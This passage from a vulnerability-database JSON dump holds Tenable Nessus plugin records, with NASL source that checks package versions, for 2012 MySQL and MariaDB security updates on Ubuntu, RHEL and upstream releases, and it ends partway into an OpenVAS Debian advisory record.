:\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html\nhttp://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.h\ntml.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "UBUNTU_USN-1621-1.NASL", "href": "https://www.tenable.com/plugins/nessus/62815", "published": "2012-11-06T00:00:00", "title": "Ubuntu 10.04 LTS / 11.10 / 12.04 LTS / 12.10 : mysql-5.1, mysql-5.5, mysql-dfsg-5.1 vulnerabilities (USN-1621-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1621-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62815);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2012-3144\", \"CVE-2012-3147\", \"CVE-2012-3149\", \"CVE-2012-3150\", \"CVE-2012-3156\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\", \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\", \"CVE-2012-3180\", \"CVE-2012-3197\");\n script_bugtraq_id(55990, 56003, 56005, 56006, 56008, 56013, 56017, 56018, 56021, 56022, 56027, 56028, 56036, 56041);\n script_xref(name:\"USN\", value:\"1621-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 11.10 / 12.04 LTS / 12.10 : mysql-5.1, mysql-5.5, mysql-dfsg-5.1 vulnerabilities (USN-1621-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues were discovered in MySQL and this update\nincludes new upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.1.66 in Ubuntu 10.04 LTS and Ubuntu 11.10.\nUbuntu 12.04 LTS and Ubuntu 12.10 have been updated to MySQL 5.5.28.\n\nIn addition to security fixes, the updated packages contain bug fixes,\nnew features, and possibly incompatible changes.\n\nPlease see the following for more information :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html\nhttp://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.h\ntml.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1621-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected mysql-server-5.1 and / or mysql-server-5.5\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|11\\.10|12\\.04|12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 11.10 / 12.04 / 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-server-5.1\", pkgver:\"5.1.66-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"mysql-server-5.1\", pkgver:\"5.1.66-0ubuntu0.11.10.2\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"mysql-server-5.5\", pkgver:\"5.5.28-0ubuntu0.12.04.2\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"mysql-server-5.5\", pkgver:\"5.5.28-0ubuntu0.12.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql-server-5.1 / mysql-server-5.5\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:53:24", "bulletinFamily": "scanner", "description": "Updated mysql packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThis update fixes several vulnerabilities in the MySQL database\nserver. Information about these flaws can be found on the Oracle\nCritical Patch Update Advisory pages, listed in the References\nsection. (CVE-2012-1688, CVE-2012-1690, CVE-2012-1703, CVE-2012-2749,\nCVE-2012-0540, CVE-2012-1689, CVE-2012-1734, CVE-2012-3163,\nCVE-2012-3158, CVE-2012-3177, CVE-2012-3166, CVE-2012-3173,\nCVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\nCVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the\nMySQL release notes listed in the References section for a full list\nof changes.\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2012-1462.NASL", "href": "https://www.tenable.com/plugins/nessus/62923", "published": "2012-11-15T00:00:00", "title": "RHEL 6 : mysql (RHSA-2012:1462)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1462. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62923);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:36\");\n\n script_cve_id(\"CVE-2012-0540\", \"CVE-2012-1688\", \"CVE-2012-1689\", \"CVE-2012-1690\", \"CVE-2012-1703\", \"CVE-2012-1734\", \"CVE-2012-2749\", \"CVE-2012-3150\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\", \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\", \"CVE-2012-3180\", \"CVE-2012-3197\");\n script_bugtraq_id(53058, 53067, 53074, 54540, 54547, 54551, 55120, 55990, 56003, 56005, 56017, 56018, 56021, 56027, 56028, 56036, 56041);\n script_xref(name:\"RHSA\", value:\"2012:1462\");\n\n script_name(english:\"RHEL 6 : mysql (RHSA-2012:1462)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThis update fixes several vulnerabilities in the MySQL database\nserver. Information about these flaws can be found on the Oracle\nCritical Patch Update Advisory pages, listed in the References\nsection. (CVE-2012-1688, CVE-2012-1690, CVE-2012-1703, CVE-2012-2749,\nCVE-2012-0540, CVE-2012-1689, CVE-2012-1734, CVE-2012-3163,\nCVE-2012-3158, CVE-2012-3177, CVE-2012-3166, CVE-2012-3173,\nCVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\nCVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the\nMySQL release notes listed in the References section for a full list\nof changes.\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n # http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d0bd5117\"\n );\n # http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html#\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5c32e24\"\n );\n # http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html#\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?687fd865\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-62.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-62.html\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-64.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-64.html\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-65.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-65.html\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:1462\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1703\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3158\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3167\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3180\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:1462\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mysql-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mysql-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mysql-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mysql-bench-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mysql-bench-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mysql-bench-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-debuginfo-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-devel-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-embedded-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-embedded-devel-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-libs-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mysql-server-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mysql-server-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mysql-server-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mysql-test-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mysql-test-5.1.66-1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mysql-test-5.1.66-1.el6_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-debuginfo / mysql-devel / etc\");\n }\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:09:48", "bulletinFamily": "scanner", "description": "The version of MySQL 5.5 installed on the remote host is earlier than\n5.5.28 and is, therefore, affected by vulnerabilities in the following\ncomponents :\n\n - GIS Extension\n - Server\n - Server Installation\n - Server Optimizer\n - yaSSL", "modified": "2019-12-02T00:00:00", "id": "MYSQL_5_5_28.NASL", "href": "https://www.tenable.com/plugins/nessus/62642", "published": "2012-10-19T00:00:00", "title": "MySQL 5.5 < 5.5.28 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62642);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/12/04\");\n\n script_cve_id(\n \"CVE-2012-0553\",\n \"CVE-2012-3160\",\n \"CVE-2012-3177\",\n \"CVE-2012-3180\",\n \"CVE-2012-5060\"\n );\n script_bugtraq_id(\n 56003,\n 56005,\n 56027,\n 57411,\n 58594\n );\n\n script_name(english:\"MySQL 5.5 < 5.5.28 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MySQL server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL 5.5 installed on the remote host is earlier than\n5.5.28 and is, therefore, affected by vulnerabilities in the following\ncomponents :\n\n - GIS Extension\n - Server\n - Server Installation\n - Server Optimizer\n - yaSSL\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/5.5/en/news-5-5-28.html\");\n # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87547c81\");\n # https://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ff06601\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/sunsecurity/cve-2012-0553-buffer-overflow-vulnerability-in-yassl\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL version 5.5.28 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0553\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/10/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(fixed:'5.5.28', min:'5.5', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:06:05", "bulletinFamily": "scanner", "description": "The version of MariaDB 5.5 running on the remote host is prior to\n5.5.28. It is, therefore, potentially affected by vulnerabilities in\nthe following components :\n\n - GIS Extension\n - Server\n - Server Installation\n - Server Optimizer\n - yaSSL", "modified": "2019-12-02T00:00:00", "id": "MARIADB_5_5_28.NASL", "href": "https://www.tenable.com/plugins/nessus/65731", "published": "2013-03-29T00:00:00", "title": "MariaDB 5.5 < 5.5.28 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65731);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\n \"CVE-2012-0553\",\n \"CVE-2012-3160\",\n \"CVE-2012-3177\",\n \"CVE-2012-3180\",\n \"CVE-2012-5060\"\n );\n script_bugtraq_id(\n 56003,\n 56005,\n 56027,\n 57411,\n 58594\n );\n\n script_name(english:\"MariaDB 5.5 < 5.5.28 Multiple Vulnerabilities\");\n script_summary(english:\"Checks MariaDB version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB 5.5 running on the remote host is prior to\n5.5.28. It is, therefore, potentially affected by vulnerabilities in\nthe following components :\n\n - GIS Extension\n - Server\n - Server Installation\n - Server Optimizer\n - yaSSL\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-5528-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/5.5/en/news-5-5-28.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 5.5.28 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0553\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/29\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'5.5.28-MariaDB', min:'5.5', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:52:06", "bulletinFamily": "scanner", "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.", "modified": "2017-07-07T00:00:00", "published": "2013-09-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=892581", "id": "OPENVAS:892581", "title": "Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2581_1.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2581-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mysql-5.1 on 